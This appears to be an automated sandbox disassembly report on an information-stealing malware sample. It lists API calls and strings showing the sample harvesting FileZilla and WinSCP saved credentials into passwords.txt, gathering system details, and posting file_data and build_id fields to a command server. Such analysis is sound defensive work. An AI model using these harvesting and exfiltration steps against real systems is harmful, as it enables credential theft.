HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction ID: a2d0142ef4c2f8337792e91bc85231d42bd55b383edadc254ac7c872ecc74bf6
Opcode Fuzzy Hash: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction Fuzzy Hash: 33D05EB6200208BBD7449BD5EC8DF8E7BBCEB85725F100265FA46D2290DAF099488B34

Function 00410FBA Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 00410FD4
wsprintfA.USER32 ref: 00410FEC

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
Instruction ID: 6e5c45132ae1b45d6529ef5bd4d0c5c9796b2e2d3bf3e93bb3fd0621c026135a
Opcode Fuzzy Hash: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
Instruction Fuzzy Hash: E8E092B0D1020D9BCF04DF60EC459DE77FCEB08208F4055B5A505E3180D674AB89CF44

Function 004014AD Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418544), ref: 004014DF

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction ID: b529297655fd12c0b63a16027a5c7bdef515ed443d31e096b8a78f326fd23762
Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction Fuzzy Hash: C1F08C32A00150EBCF20CF59D804AAAFBB8EB43760F257065E809B3260C334ED11EA9C

Function 00405482 Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

lstrlenA.KERNEL32(?), ref: 00405519

Part of subcall function 00411E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
Part of subcall function 00411E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
Part of subcall function 00411E5D: HeapAlloc.KERNEL32(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91

StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004056C0
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405736

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

lstrlenA.KERNEL32(?,",file_data,00437850,------,00437844,?,",00437838,------,0043782C,6c8ce6f422a1d9cf34f23d1c2168e754,",build_id,00437814,------), ref: 00405C67
lstrlenA.KERNEL32(?), ref: 00405C7A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405C92
HeapAlloc.KERNEL32(00000000), ref: 00405C99
lstrlenA.KERNEL32(?), ref: 00405CA6
_memmove.LIBCMT ref: 00405CB4
lstrlenA.KERNEL32(?,?,?), ref: 00405CC9
_memmove.LIBCMT ref: 00405CD6
lstrlenA.KERNEL32(?), ref: 00405CE4
lstrlenA.KERNEL32(?,?,00000000), ref: 00405CF2
_memmove.LIBCMT ref: 00405D05
lstrlenA.KERNEL32(?,?,00000000), ref: 00405D1A
HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405D6F
InternetReadFile.WININET(?,?,000007CF,?), ref: 00405E26
StrCmpCA.SHLWAPI(?,block), ref: 00405E3B
ExitProcess.KERNEL32 ref: 00405E46

Strings

", xrefs: 00405C35
------, xrefs: 0040589D
ERROR, xrefs: 00405F2F
--, xrefs: 00405600
file_data, xrefs: 00405C09
", xrefs: 00405AD8
ERROR, xrefs: 00405D79
------, xrefs: 004059FF
block, xrefs: 00405E30
", xrefs: 0040581B
", xrefs: 0040597B
6c8ce6f422a1d9cf34f23d1c2168e754, xrefs: 004059A7
------, xrefs: 00405605
------, xrefs: 0040573C
------, xrefs: 00405B5D
build_id, xrefs: 0040594F

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
String ID: ------$"$"$"$"$--$------$------$------$------$6c8ce6f422a1d9cf34f23d1c2168e754$ERROR$ERROR$block$build_id$file_data
API String ID: 2638065154-2931481507
Opcode ID: 728df9254f14c32eb0309421fbc2d51be9a45682cb524dc00f6aca4526101756
Instruction ID: a1f310b16752a75a1e3861b17425502ee47d614580a36b5f1e1f8e1f13a41955
Opcode Fuzzy Hash: 728df9254f14c32eb0309421fbc2d51be9a45682cb524dc00f6aca4526101756
Instruction Fuzzy Hash: 3742E671D401699BDF21FB21DC45ACDB3B9BF04308F0085E6A548B3152DAB86FCA9F98

Function 0040E6CF Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 289
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

strtok_s.MSVCRT ref: 0040E77E
GetProcessHeap.KERNEL32(00000000,000F423F,00436912,0043690F,0043690E,0043690D), ref: 0040E7C4
HeapAlloc.KERNEL32(00000000), ref: 0040E7CB
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E7DF
lstrlenA.KERNEL32(00000000), ref: 0040E7EA
StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E81E
lstrlenA.KERNEL32(00000000), ref: 0040E829
StrStrA.SHLWAPI(00000000,<User>), ref: 0040E857
lstrlenA.KERNEL32(00000000), ref: 0040E862
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E890
lstrlenA.KERNEL32(00000000), ref: 0040E89B
lstrlenA.KERNEL32(?), ref: 0040E901
lstrlenA.KERNEL32(?), ref: 0040E915
lstrlenA.KERNEL32(0040ECBC), ref: 0040EA3D

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Strings

Host: , xrefs: 0040E954
passwords.txt, xrefs: 0040EA4D
<Port>, xrefs: 0040E818
<Pass encoding="base64">, xrefs: 0040E88A
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040E71F
Password: , xrefs: 0040E9AE
Login: , xrefs: 0040E98C
<User>, xrefs: 0040E851
Soft: FileZilla, xrefs: 0040E948
<Host>, xrefs: 0040E7D9

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 4146028692-935134978
Opcode ID: daf18828ca77f1c77d3f07f28c52861645635e7fac20ced428b2830730ead7d9
Instruction ID: 2e9f852a615408e756f1d7d3730d5668bfc6bf7d6dc94c0724fe4efb67adb4f0
Opcode Fuzzy Hash: daf18828ca77f1c77d3f07f28c52861645635e7fac20ced428b2830730ead7d9
Instruction Fuzzy Hash: 6FA17572A40219BBCF01FBA1DD4AADD7775AF08305F105426F501F30A1EBB9AE498F99

Function 00406BB5 Relevance: 63.6, APIs: 20, Strings: 16, Instructions: 598
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406C54
StrCmpCA.SHLWAPI(?), ref: 00406C72
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406E0A
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00406E4E
lstrlenA.KERNEL32(?,",status,00437998,------,0043798C,",task_id,00437978,------,0043796C,",mode,00437958,------,0043794C), ref: 0040753C
lstrlenA.KERNEL32(?), ref: 0040754B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407556
HeapAlloc.KERNEL32(00000000), ref: 0040755D
lstrlenA.KERNEL32(?), ref: 0040756A
_memmove.LIBCMT ref: 00407578
lstrlenA.KERNEL32(?), ref: 00407586
lstrlenA.KERNEL32(?,?,00000000), ref: 00407594
_memmove.LIBCMT ref: 004075A1
lstrlenA.KERNEL32(?,?,00000000), ref: 004075B6
HttpSendRequestA.WININET(00000000,?,00000000), ref: 004075C4
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00407621
InternetCloseHandle.WININET(00000000), ref: 0040762C
InternetCloseHandle.WININET(?), ref: 00407638
InternetCloseHandle.WININET(?), ref: 00407644
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406E7C

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

------, xrefs: 0040729F
", xrefs: 004070C1
------, xrefs: 00407145
------, xrefs: 00406E82
------, xrefs: 00406FE3
", xrefs: 0040721D
------, xrefs: 004073FF
status, xrefs: 004074B1
mode, xrefs: 004071F1
6c8ce6f422a1d9cf34f23d1c2168e754, xrefs: 004070ED
", xrefs: 004074DD
task_id, xrefs: 00407351
", xrefs: 0040737D
", xrefs: 00406F61
------, xrefs: 00406CFC
build_id, xrefs: 00407095

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$"$"$------$------$------$------$------$------$6c8ce6f422a1d9cf34f23d1c2168e754$build_id$mode$status$task_id
API String ID: 3702379033-307093860
Opcode ID: 94bce884781040e8ff422804929f0a0c041406c1a25af2ad4ea517ec93a7a6fd
Instruction ID: f28151e3697947f206a0980c25f575650e410a772d733d80a29dba40e216d304
Opcode Fuzzy Hash: 94bce884781040e8ff422804929f0a0c041406c1a25af2ad4ea517ec93a7a6fd
Instruction Fuzzy Hash: 7552897194016D9ACF61EB62CD46BCCB3B5AF04308F4184E7A51D73161DA746FCA8FA8

Function 00405F39 Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 466
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
StrCmpCA.SHLWAPI(?), ref: 00405FF6
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
lstrlenA.KERNEL32(?,",mode,004378D8,------,004378CC,6c8ce6f422a1d9cf34f23d1c2168e754,",build_id,004378B4,------,004378A8,",0043789C,------), ref: 004065FD
lstrlenA.KERNEL32(?), ref: 0040660C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406617
HeapAlloc.KERNEL32(00000000), ref: 0040661E
lstrlenA.KERNEL32(?), ref: 0040662B
_memmove.LIBCMT ref: 00406639
lstrlenA.KERNEL32(?), ref: 00406647
lstrlenA.KERNEL32(?,?,00000000), ref: 00406655
_memmove.LIBCMT ref: 00406662
lstrlenA.KERNEL32(?,?,00000000), ref: 00406677
HttpSendRequestA.WININET(00000000,?,00000000), ref: 00406685
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
InternetCloseHandle.WININET(00000000), ref: 004066ED
InternetCloseHandle.WININET(?), ref: 004066F9
InternetCloseHandle.WININET(?), ref: 00406705
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

build_id, xrefs: 00406419
6c8ce6f422a1d9cf34f23d1c2168e754, xrefs: 00406471
", xrefs: 00406445
------, xrefs: 00406206
", xrefs: 004062E5
------, xrefs: 004064C9
mode, xrefs: 00406575
", xrefs: 004065A1
------, xrefs: 00406080
------, xrefs: 00406367

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$------$------$------$------$6c8ce6f422a1d9cf34f23d1c2168e754$build_id$mode
API String ID: 3702379033-4181873486
Opcode ID: 89793100b31f161b87fc7d4451beb843dbd63545ddb40e14516daf7b13bddfee
Instruction ID: 82dd920f4857eb4424cccb8e833476094bcda5e32b3baf042c939ae059a0737f
Opcode Fuzzy Hash: 89793100b31f161b87fc7d4451beb843dbd63545ddb40e14516daf7b13bddfee
Instruction Fuzzy Hash: FF22B9719401699BCF21EB62CD46BCCB7B5AF04308F4144E7A60DB3151DAB56FCA8FA8

Function 0040E186 Relevance: 51.1, APIs: 15, Strings: 14, Instructions: 325
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0040E1B7
_memset.LIBCMT ref: 0040E1D7
_memset.LIBCMT ref: 0040E1E8
_memset.LIBCMT ref: 0040E1F9
RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E22D
RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E2BD
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E2E0
RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368E7), ref: 0040E379
RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9

Strings

Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0040E2B3
Security, xrefs: 0040E253
:22, xrefs: 0040E42D
passwords.txt, xrefs: 0040E662
